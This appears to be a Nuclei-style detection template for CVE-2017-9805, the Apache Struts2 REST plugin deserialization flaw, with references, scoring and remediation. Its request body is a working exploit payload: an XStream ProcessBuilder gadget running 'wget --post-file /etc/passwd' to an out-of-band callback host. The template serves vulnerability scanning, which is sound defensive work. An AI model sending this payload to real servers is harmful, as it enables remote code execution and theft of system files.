id: CVE-2017-9805 info: name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 - http://www.securitytracker.com/id/1039263 - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 epss-score: 0.97556 epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: struts tags: cve,cve2017,apache,rce,struts,kev http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" body: | 0 false 0 wget --post-file /etc/passwd {{interactsh-url}} false java.lang.ProcessBuilder start asdasd asdasd false 0 0 false false 0 headers: Content-Type: application/xml matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500 # digest: 4a0a00473045022100d42d3b4a0f67ff715926b8c3abbafeaaa90b8a9347735e9c432e648d151b55f502205a9879968f5fc1a59c2a1da3f914280ffec004bbd2b8484f904a2ef1729b8156:922c64590222798bb761d5b6d8e72950